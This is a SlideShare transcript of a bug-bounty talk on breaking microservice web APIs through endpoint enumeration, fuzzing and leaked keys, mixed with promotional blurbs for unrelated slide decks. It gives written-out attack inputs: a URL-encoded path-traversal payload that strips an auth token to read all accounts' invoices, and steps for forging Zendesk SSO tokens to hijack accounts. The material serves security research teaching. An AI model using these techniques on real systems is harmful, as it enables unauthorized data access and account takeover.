SlideShare a Scribd company logo
FRANS ROSÉN
A methodology using
fuzzing and info disclosure
FRANS ROSÉN
Security Advisor @detectify
CTO @centra
HackerOne #5 @ /leaderboard/all-time
Blogs at labs.detectify.com
@fransrosen
FRANS ROSÉN
Rundown
• Imaginary app structure and methodology on
breaking it
FRANS ROSÉN
Rundown
• Imaginary app structure and methodology on
breaking it
• Real-life vulnerabilities found

using these techniques

Recommended for you

Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology

The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.

ekopartybug hunterbug bounties
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2

This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.

netviewdittometasploit
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016

This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan. Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd

bug bountieswhite hat hackerinformation security
FRANS ROSÉN
Rundown
• Imaginary app structure and methodology on
breaking it
• Real-life vulnerabilities found

using these techniques
• Many ways to do this, this is just one example!
FRANS ROSÉN
Structure of our imaginary app
FRANS ROSÉN
Client based micro services
business.example.com
SPA + a lot of JS
FRANS ROSÉN
Client based micro services
invoice.example.com
business.example.com
conversation.example.com
api.example.com
CORS-requests to different apps
SPA + a lot of JS

Recommended for you

How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...

This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.

securityvulnerabilitybugbounty
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

Presentation from LevelUp 0x03 conference - https://forum.bugcrowd.com/t/levelup-0x03-aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs-by-0ang3el/

aemhackingbug hunting
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass

Another way to bypass WAF Cheat Sheet

FRANS ROSÉN
Client based micro services
business.example.com
/api/v1/users
/api/v1/users/123
…
/api/v3/invoices
/api/v3/invoices/123
…
/api/v2/messages
/api/v2/messages/123
…
CORS-requests to different apps:
SPA + a lot of JS
invoice.example.com
conversation.example.com
api.example.com
FRANS ROSÉN
Ways forward
1.Locate all APIs/micro-services used
FRANS ROSÉN
Ways forward
1.Locate all APIs/micro-services used
2.Extract all API-endpoints we can find
FRANS ROSÉN
API-endpoints per microservice
• invoice.example.com

Recommended for you

Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice

Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.

security writeupbugbountysql injection
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors

XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog

wafpayloadvector
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them

Slides from adaptTo() 2019 - https://adapt.to/2019/en/schedule/securing-aem-webapps-by-hacking-them.html.

information securityapplication securityaem
FRANS ROSÉN
API-endpoints per microservice
• invoice.example.com
/api/v3/invoices
/api/v3/invoices/1234
/api/v3/accounts
/api/v3/accounts/1234
Found in JS:
FRANS ROSÉN
API-endpoints per microservice
• invoice.example.com
Found in JS: /invoices*
/accounts*
/api
/api/v3
/api/v3/invoices*
/api/v3/accounts*
…
Save to path-lists:
/api/v3/invoices
/api/v3/invoices/1234
/api/v3/accounts
/api/v3/accounts/1234
FRANS ROSÉN
• invoice.example.com
Found in JS: /invoices*
/accounts*
/api
/api/v3
/api/v3/invoices*
/api/v3/accounts*
…
Save to path-lists:
/api/v3/invoices
/api/v3/invoices/1234
/api/v3/accounts
/api/v3/accounts/1234
The * tells us it supports direct requests or additional paths
for IDs or similar: /invoices/123
FRANS ROSÉN
API-endpoints per microservice
• conversation.example.com
/api/v2/online
/api/v2/conversations
/api/v2/websocket
Found in JS:

Recommended for you

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection

Presentation from Zero Nights 2017 - https://2017.zeronights.ru/report/tryuki-dlya-obhoda-csrf-zashhity/.

csrfapplication securityvulnerabilities
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour

Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism. Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.

wafwaf bypassbypass
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks

This talk shares the various techniques I found whilst building the XSS cheat sheet. It contains auto executing vectors, AngularJS CSP bypasses and dangling markup attacks.

xsshtmlvectors
FRANS ROSÉN
API-endpoints per microservice
• conversation.example.com
/api/v2/online
/api/v2/conversations
/api/v2/websocket
Found in JS:
/online
/conversations*
/websocket
/api/v2
/api/v2/conversations*
…
Save to path-lists:
FRANS ROSÉN
Continue to curate lists
Find more endpoints:
• Desktop client
• Web-archive
• PHP/Java/Golang-SDKs
• npm/composer/yarn
• Documentation
FRANS ROSÉN
Now we have this
• List of all available endpoints: /conversations*
/invoices*
/users*
…
FRANS ROSÉN
Now we have this
• List of all available endpoints:
• Also separate prefixes:
/api
/api/v3
/api/v2
/api/v1
…
/conversations*
/invoices*
/users*
…

Recommended for you

A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security

Mikhail Egorov gave a presentation on security vulnerabilities in Adobe Experience Manager (AEM) applications. He discussed three vulnerabilities - CVE-2019-8086, CVE-2019-8087, and CVE-2019-8088 - which involved XML external entity injection, JavaScript code injection, and ways to exploit them. He explained the technical details of each vulnerability and provided examples of payloads and steps required for exploitation. Egorov concluded by recommending keeping AEM updated, blocking anonymous write access to certain paths, and removing demo content to help prevent security issues.

Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhyd

The document provides an overview of key features and capabilities of Burp Suite, a popular web application security testing tool. It discusses how to configure Burp Suite for optimal performance, techniques for proxying and filtering traffic, exploiting vulnerabilities using the intruder tool, passive and active scanning with the scanner, replaying requests with the repeater, crawling sites with the spider, analyzing tokens with the sequencer, decoding responses with the decoder, comparing responses with the comparer, searching with engagement tools, extending functionality with extender, maintaining the state of assessments, and references for additional learning. The document is intended to help users get started with Burp Suite and leverage its full capabilities as a "pro."

hack like a pro with burp suite
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter

2015/12: I removed some slides because some vectors are not fixed yet. 2016/12: Disclosed full verson

FRANS ROSÉN
Now we have this
• List of all available endpoints:
• Also separate prefixes:
/api
/api/v3
/api/v2
/api/v1
…
/conversations*
/invoices*
/users*
…
• And all subdomains used:
invoice.example.com
api.example.com
business.example.com
…
FRANS ROSÉN
Now, combine it all:
• Test everything on everything

subdomain-list * path-prefix-list * path-suffix-list
• Add additional standard fuzz to suffix-list
test
"
'

#
…
FRANS ROSÉN
What we might find
• New or old endpoints not in use

Might leak more data than the current one

FRANS ROSÉN
What we might find
• New or old endpoints not in use

Might leak more data than the current one



Example of this happening IRL!

Recommended for you

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques

General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.

hackwaf
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties

The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.

hackingbugbountybounty
Eyeing the Onion
Eyeing the OnionEyeing the Onion
Eyeing the Onion

This document provides an overview of a presentation on integrating additional data sources into the Elastic Logstash and Kibana (ELK) stack. It discusses using Security Onion for log collection and analysis and integrating vulnerability assessment data and host configuration data into ELK for enhanced security incident response. Examples are given of using Bro logs, Nmap scans, and Nessus/OpenVAS reports to query for related events and behaviors. Methods for collecting and parsing process and system information are also outlined.

FRANS ROSÉN
{
"boards": [
{
"id": 123,
"user": 124,
"username": "test"
…
}
]
}
API currently in use, v2
/api/v2/boards/123
FRANS ROSÉN
/api/v4/boards/123
{
"includes": {"user": false},
"boards": [
{
"id": 123,
"user": 124,
"username": "test"
…
}
]
v4 was a JSON-API not being used
FRANS ROSÉN
/api/v4/boards/123
{
"includes": {"user": false},
"boards": [
{
"id": 123,
"user": 124,
"username": "test"
…
}
]
Tells us what to include
FRANS ROSÉN
/api/v4/boards/123?
include=user
{
"includes": {"user": true},
"boards": [
{
"attributes": {
"user": {
"email": "secret@x.com",
"phone": "004324235342"
…
}
"New version of JSON-API for message boards
leaked emails + phone numbers for all users"

Recommended for you

Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example

Web Applications Hacking – Ruby on Rails example. Attack web applications by using SQL attacks, CSRF, XSS. You will learn how to extract information by generating API json / xml and how to use cookies to code injection.

developerworkshopsql
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspective

Nowadays REST APIs are behind each mobile and nearly all of web applications. As such they bring a wide range of possibilities in cases of communication and integration with given system. But with great power comes great responsibility. This talk aims to provide general guidance related do API security assessment and covers common API vulnerabilities. We will look at an API interface from the perspective of potential attacker. I will show: how to find hidden API interfaces ways to detect available methods and parameters fuzzing and pentesting techniques for API calls typical problems I will share several interesting cases from public bug bounty reports and personal experience, for example: * how I got various credentials with one API call * how to cause DoS by running Garbage Collector from API

rest apisecurityapplication security
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year later

This document discusses the Heartbleed bug in OpenSSL and the creation of LibreSSL as a more secure alternative. It notes that 17% of HTTPS servers were vulnerable to Heartbleed, which allowed attackers to steal passwords, credit cards, and other private data from server memory. LibreSSL was created to have fewer lines of code, modern coding practices, and fewer portability workarounds than OpenSSL to address bugs like Heartbleed. The document emphasizes fixing bugs quickly and not reinventing standard library functions.

securitytlsssl
FRANS ROSÉN
What we might find
• New or old endpoints not in use

Might leak more data than the current one
• That the micro-services might connect server-side:

SSRF, path-traversal, bypass query-strings used…

FRANS ROSÉN
What we might find
• New or old endpoints not in use

Might leak more data than the current one
• That the micro-services might connect server-side:

SSRF, path-traversal, bypass query-strings used…



Example of this happening IRL!
FRANS ROSÉN
Regular API-endpoint to fetch
invoices
/api/v3/invoices/123
FRANS ROSÉN
Regular API-endpoint to fetch
invoices
/api/v3/invoices/123
{
"invoice": {
"url": "/api/v3/invoices/
123?token=xyz&expire=123
}
}

Recommended for you

Web API Security
Web API SecurityWeb API Security
Web API Security

This presentation gives an impression of the threats you are facing when designing or developing a web API.

attacksapisecurity
FOXX - a Javascript application framework on top of ArangoDB
FOXX - a Javascript application framework on top of ArangoDBFOXX - a Javascript application framework on top of ArangoDB
FOXX - a Javascript application framework on top of ArangoDB

This document discusses ArangoDB Foxx, a feature of ArangoDB that allows developers to define REST APIs and build single page web applications directly against the ArangoDB database using JavaScript. Foxx allows defining controllers with routes, parameterizing routes, generating documentation, and structuring models. It aims to provide a streamlined way for front-end developers to interface directly with the database without overhead typically involved in separating concerns across servers. The document outlines several Foxx features and capabilities including authentication, asset handling, and sharing code through a repository.

nosqlapijavascript
Hypermedia: The Missing Element to Building Adaptable Web APIs in Rails
Hypermedia: The Missing Element to Building Adaptable Web APIs in RailsHypermedia: The Missing Element to Building Adaptable Web APIs in Rails
Hypermedia: The Missing Element to Building Adaptable Web APIs in Rails

RubyKaigi 2014 http://rubykaigi.org/2014/presentation/S-ToruKawamura Japanese enlargement version http://www.slideshare.net/tkawa1/rubykaigi2014-hypermedia-the-missing-element-enlarged-ja

railsrubyrest
FRANS ROSÉN
Different ID than my own invoices
/api/v3/invoices/124
{
"error": "access denied"
}
FRANS ROSÉN
Fuzzing, double quote:
/api/v3/invoices/"
{
"error": "Bad URI: /api/v1/
invoices/""
}
FRANS ROSÉN
Sent to v3, error with v1?
/api/v3/invoices/"
{
"error": "Bad URI: /api/v1/
invoices/""
}
FRANS ROSÉN
Possible explanation
Endpoint at /api/v3/invoices/{id} makes an internal call
to a different service:
route('/api/v3/invoices/{id}', () => {
return
api.call(
`http://internal-api/api/v1/invoices/${id}?
token=${userToken}`
)
})

Recommended for you

RoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails exampleRoR Workshop - Web applications hacking - Ruby on Rails example
RoR Workshop - Web applications hacking - Ruby on Rails example

Web Applications Hacking – Ruby on Rails example. Attack web applications by using SQL attacks, CSRF, XSS. You will learn how to extract information by generating API json / xml and how to use cookies to code injection.

codingworkshopweb app
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi

The document discusses web application security testing. It introduces web application penetration testing and the OWASP Top 10 security vulnerabilities like injection and XSS. It provides examples of SQL injection vulnerabilities and how to exploit URLs. It discusses how to prevent these vulnerabilities through input validation, output encoding and using parameterized queries. It also covers session management vulnerabilities and the importance of authentication and authorization for application resources.

Serverless in production, an experience report (Going Serverless)
Serverless in production, an experience report (Going Serverless)Serverless in production, an experience report (Going Serverless)
Serverless in production, an experience report (Going Serverless)

1. The document discusses best practices for making serverless applications production ready, including practices around testing, monitoring, logging, configuration management, and continuous integration/deployment. 2. It recommends integrating serverless applications with services like API Gateway, Kinesis, DynamoDB, and SSM Parameter Store and considering practices like centralized logging, distributed tracing, role-based access controls, and parameterizing configurations. 3. The document emphasizes the importance of testing at the unit, integration, and end-to-end/acceptance levels and having automated testing and deployment pipelines to catch errors and deploy changes quickly and reliably.

serverlessawsaws lambda
FRANS ROSÉN
Possible explanation
Endpoint at /api/v3/invoices/{id} makes an internal call
to a different service:
route('/api/v3/invoices/{id}', () => {
return
api.call(
`http://internal-api/api/v1/invoices/${id}?
token=${userToken}`
)
})
FRANS ROSÉN
Send valid accessible ID,
fuzz query-params
/api/v3/invoices/123?FUZZ=x&
/api/v3/invoices/123%3fFUZZ%3dx%26
FRANS ROSÉN
Send valid accessible ID,
fuzz query-params
/api/v3/invoices/123?FUZZ=x&
/api/v3/invoices/123%3fFUZZ%3dx%26
Theory: server-side call:
http://internal-api/api/v1/invoices/
123?token=x&token=xxx
FRANS ROSÉN
Send valid accessible ID,
fuzz query-params
{
"error": "access denied"
}
/api/v3/invoices/123?FUZZ=x&
/api/v3/invoices/123%3fFUZZ%3dx%26
Theory: server-side call:
http://internal-api/api/v1/invoices/
123?token=x&token=xxx

Recommended for you

Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED

This document discusses various techniques for finding and exploiting vulnerabilities during a penetration test when vulnerabilities are marked as "low" or "medium" in severity. It argues that penetration testers and clients should not rely solely on vulnerability scanners and should thoroughly investigate even lower severity issues. Specific techniques mentioned include exploiting default credentials on services like VNC, exploiting exposed admin interfaces found through tools like Metasploit, taking advantage of browsable directories with backups or other sensitive files, exploiting SharePoint misconfigurations, exploiting HTTP PUT or WebDAV configurations, exploiting Apple Filing Protocol, and exploiting trace.axd to view request details in .NET applications. The document emphasizes finding overlooked vulnerabilities and keeping "a human in the mix" rather than full reliance

chris gatespentestingcarnal0wnage
Building Awesome APIs in Grails
Building Awesome APIs in GrailsBuilding Awesome APIs in Grails
Building Awesome APIs in Grails

This document discusses building awesome APIs in Grails. It covers various features that make an API awesome, including using JSON payloads, adhering to REST principles, predictable and consistent responses, stable versions, intuitive URI and response structures, flexible responses through partial responses, filtering, and customized responses. It provides examples of designing an API for a phone shopping application, including potential resources, features, endpoints, versioning, response structures, formats, and more. It demonstrates how to implement many of these features in Grails through domain modeling, controllers, URL mappings, custom marshallers, and other Grails features.

Designing & Building Secure Web APIs
Designing & Building Secure Web APIsDesigning & Building Secure Web APIs
Designing & Building Secure Web APIs

Presented by Vivek Thuravupala, Software Engineer @ Postman in joint meetup in Walmart on 28th April, BLR. Abstract: We'll talk about the exploding usage of APIs and why security shouldn't be an afterthought when it comes to designing and building APIs. We'll also run through some concrete examples illustrating common pitfalls encountered while design/building. About the speaker: Vivek builds stuff for the web, and he's been swimming around in various tech ponds since he was a kid. At Postman, he keeps an eye on a bunch of the user-facing products.

websecureweb api
FRANS ROSÉN
/api/v3/invoices/123%3ftoken%3dx%26
http://internal-api/api/v1/invoices/
123?token=x&token=xxx
{
"error": "access denied"
}
We now know that token is being used!
Theory: server-side call:
FRANS ROSÉN
Path-traversal,
reach outside of invoices/
/api/v3/invoices/%2e%2e%2fFUZZ
FRANS ROSÉN
Path-traversal,
reach outside of invoices/
/api/v3/invoices/%2e%2e%2fFUZZ
We know token is used in query, move it to fragment:
/api/v3/invoices/%2e%2e%2fFUZZ%23
internal-api/api/v1/invoices/../FUZZ#
FRANS ROSÉN
Traversing into accounts/ without
the token query parameter
/api/v3/invoices/%2e%2e%2faccounts%23

Recommended for you

Serverless in production, an experience report (JeffConf)
Serverless in production, an experience report (JeffConf)Serverless in production, an experience report (JeffConf)
Serverless in production, an experience report (JeffConf)

This document provides an experience report on getting serverless applications ready for production. It discusses several important considerations for production readiness including testing, monitoring and alerting, configuration management, security, and continuous integration/delivery pipelines. The document also shares lessons learned from rebuilding several services using a serverless approach at Skype and the cost savings and velocity gains achieved.

awsaws lambdacloud
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008

Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.

Building websites with Node.ACS
Building websites with Node.ACSBuilding websites with Node.ACS
Building websites with Node.ACS

This document discusses building websites using Node.ACS, which allows developing and publishing Node.js apps to the cloud. It provides an overview of Node.ACS and steps for installing, creating, and publishing a simple website using Node.ACS, including using an MVC framework and sessions. Examples of configuration files, controllers, and views are also included.

titaniumappceleratorjavascript
FRANS ROSÉN
Traversing into accounts/ without
the token query parameter
/api/v3/invoices/%2e%2e%2faccounts%23
{
"accounts": [
{"account": 123, "name": "Other Business", "email":
"secret@x.com", "invoices": [
{"id": 123, "amount": 1100.00 …}
{"id": 123, "amount": 1100.00 …}
…
]
FRANS ROSÉN
"Path-traversal getting access to all
invoice accounts"
/api/v3/invoices/%2e%2e%2faccounts%23
{
"accounts": [
{"account": 123, "name": "Other Business", "email":
"secret@x.com", "invoices": [
{"id": 123, "amount": 1100.00 …}
{"id": 123, "amount": 1100.00 …}
…
]
We can access all accounts and all their invoices!
FRANS ROSÉN
"Path-traversal getting access to all
invoice accounts"
{
"accounts": [
{"account": 123, "name": "Other Business", "email":
"secret@x.com", "invoices": [
{"id": 123, "amount": 1100.00 …}
{"id": 123, "amount": 1100.00 …}
…
]
http://internal-api
/api/v1/invoices/../accounts#token=xxx
FRANS ROSÉN
Ways forward
1.Locate all APIs/micro-services used
2.Extract all API-endpoints we can find
3.Look at other strings in JS-files

Recommended for you

Building websites with Node.ACS
Building websites with Node.ACSBuilding websites with Node.ACS
Building websites with Node.ACS

A quick guide for setting up Appcelerator's Node.ACS and examples on how to build three different types of websites/APIs. Code can be found at: https://github.com/ricardoalcocer/acs_key_value_store https://github.com/ricardoalcocer/nodeacs_sample_website

titaniumnodeappcelerator
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications

The top 10 security issues in web applications are: 1. Injection flaws such as SQL, OS, and LDAP injection. 2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser. 3. Broken authentication and session management, such as not logging users out properly or exposing session IDs. 4. Insecure direct object references where users can directly access files without authorization checks. 5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend. 6. Security misconfiguration of web or application servers. 7. Insecure cryptographic storage of passwords or sensitive data. 8

web security devnology osap
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?

This document summarizes integrating the OpenNMS network monitoring platform with modern configuration management tools like Puppet. It discusses using Puppet to provision and automatically configure nodes in OpenNMS from Puppet's configuration data. The authors provide code for pulling node data from Puppet's REST API and generating an XML file for OpenNMS to import the nodes and their configuration. They also discuss opportunities to further improve the integration by developing a Java object model for Puppet's YAML output and filtering imports based on node attributes.

puppetopennmsconfiguration management
FRANS ROSÉN
What we might find
• Keys or tokens expected to be secrets

Third party apps with unclear docs if tokens should be secrets.


FRANS ROSÉN
What we might find
• Keys or tokens expected to be secrets

Third party apps with unclear docs if tokens should be secrets.



Example of this happening IRL!

FRANS ROSÉN
Zendesk SSO-key
FRANS ROSÉN
Zendesk SSO-key
zdkey: "fafc5aef56caefa56fcea65"
zdaccessurl: "https://example.zendesk.com
/access/jwt?"

Recommended for you

Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017
Building CI/CD Pipelines for Serverless Applications - SRV302 - re:Invent 2017

Building and deploying serverless applications introduces new challenges for developers whose development workflows are optimized for traditional VM-based applications. In this session, we discuss a method for automating the deployment of serverless applications running on AWS Lambda. We first cover how you can model and express serverless applications using the open-source AWS Serverless Application Model (AWS SAM). Then, we discuss how you can use CI/CD tooling from AWS CodePipeline and AWS CodeBuild, and how to bootstrap the entire toolset using AWS CodeStar. We will also cover best practices to embed in your deployment workflow specific to serverless applications. You will also hear from iRobot about its approach to serverless deployment. iRobot will share how it achieves coordinated deployments of microservices, maintains long-lived and/or separately-managed resources (like databases), and red/black deployments.

reinvent2017awsreinvent2017amazon
kiln burning and kiln burner system for clinker
kiln burning and kiln burner system for clinkerkiln burning and kiln burner system for clinker
kiln burning and kiln burner system for clinker

Kiln

SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...
SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training...

SCADAmetrics Instrumentation for Sensus Water Meters - Core and Main Training 2024 July 09

FRANS ROSÉN
Zendesk SSO-key
• Not an API-key, used for JWT-signing for simple
SSO
FRANS ROSÉN
Zendesk SSO-key
• This JSON should be signed with the SSO-key:
{
"iat": 123,
"jti": "uuid",
"name" "x",
"email": "x@x.com",
"external_id": "UUID"
}
FRANS ROSÉN
Zendesk SSO-key
• This JSON should be signed with the SSO-key:
{
"iat": 123,
"jti": "uuid",
"name" "x",
"email": "x@x.com",
"external_id": "UUID"
}
unix timestamp
random unique ID
FRANS ROSÉN
Zendesk SSO-key
• This JSON should be signed with the SSO-key:
{
"iat": 123,
"jti": "uuid",
"name" "x",
"email": "x@x.com",
"external_id": "UUID"
}
unix timestamp
random unique ID
name for user, will be updated
email for user, will be updated

Recommended for you

Response & Safe AI at Summer School of AI at IIITH
Response & Safe AI at Summer School of AI at IIITHResponse & Safe AI at Summer School of AI at IIITH
Response & Safe AI at Summer School of AI at IIITH

Talk covering Guardrails , Jailbreak, What is an alignment problem? RLHF, EU AI Act, Machine & Graph unlearning, Bias, Inconsistency, Probing, Interpretability, Bias

machine learningchatgptaisafety
Press Tool and It's Primary Components.pdf
Press Tool and It's Primary Components.pdfPress Tool and It's Primary Components.pdf
Press Tool and It's Primary Components.pdf

Press Tool and It's Primary Components

L-3536-Cost Benifit Analysis in ESIA.pptx
L-3536-Cost Benifit Analysis in ESIA.pptxL-3536-Cost Benifit Analysis in ESIA.pptx
L-3536-Cost Benifit Analysis in ESIA.pptx

..

FRANS ROSÉN
Zendesk SSO-key
• This JSON should be signed with the SSO-key:
{
"iat": 123,
"jti": "uuid",
"name" "x",
"email": "x@x.com",
"external_id": "UUID"
}
unix timestamp
random unique ID
name for user, will be updated
email for user, will be updated
UserID to hijack account
FRANS ROSÉN
Zendesk SSO-key
• Send JWT for UserID you want to hijack:
https://example.zendesk.com/access/jwt?
eYAAA.eYBBB.XXX
FRANS ROSÉN
Zendesk SSO-key
• Send JWT for UserID you want to hijack:
https://example.zendesk.com/access/jwt?
eYAAA.eYBBB.XXX
• Zendesk will reply with a session as the UserID:
https://example.zendesk.com/hc/en-us?
flash_digest=0cbfae0bec0bfea08cbfec0
FRANS ROSÉN
"Account hijack on support panel due
to publicly disclosed Zendesk SSO-key"
• Send JWT for UserID you want to hijack:
https://example.zendesk.com/access/jwt?
eYAAA.eYBBB.XXX
• Zendesk will reply with a session as the UserID:
https://example.zendesk.com/hc/en-us?
flash_digest=0cbfae0bec0bfea08cbfec0

Recommended for you

CCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.docCCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc
CCS367-STORAGE TECHNOLOGIES QUESTION BANK.doc

CCS367-STORAGE TECHNOLOGIES QUESTION BANK

 
by Dss
ccs367-storage technologies qb
Quadcopter Dynamics, Stability and Control
Quadcopter Dynamics, Stability and ControlQuadcopter Dynamics, Stability and Control
Quadcopter Dynamics, Stability and Control

A brief introduction to quadcopter (drone) working. It provides an overview of flight stability, dynamics, general control system block diagram, and the electronic hardware.

Germany Offshore Wind 010724 RE (1) 2 test.pptx
Germany Offshore Wind 010724 RE (1) 2 test.pptxGermany Offshore Wind 010724 RE (1) 2 test.pptx
Germany Offshore Wind 010724 RE (1) 2 test.pptx

offshore wind

FRANS ROSÉN
What we might find
• Keys or tokens expected to be secrets

Third party apps with unclear docs if tokens should be secrets.





FRANS ROSÉN
What we might find
• Keys or tokens expected to be secrets

Third party apps with unclear docs if tokens should be secrets.



Another example of this happening IRL!

FRANS ROSÉN
Algolia API-key
Intended to be public
a = algolia('AFBKDE54',
'7ace8b8c7fbea78caebcf78ecbfaebca7
8f');
idx = a.index('userdb');
FRANS ROSÉN
a = algolia('AFBKDE54',
'7ace8b8c7fbea78caebcf78ecbfaebca7
8f');
idx = a.index('publicdb');
App-ID
Public API-key
Algolia API-key
Intended to be public
Index name

Recommended for you

PMSM-Motor-Control : A research about FOC
PMSM-Motor-Control : A research about FOCPMSM-Motor-Control : A research about FOC
PMSM-Motor-Control : A research about FOC

This is research about a process called field-oriented control (FOC) that is used to control the pmsm motor.

#pmsmfoc
Software Engineering and Project Management - Introduction to Project Management
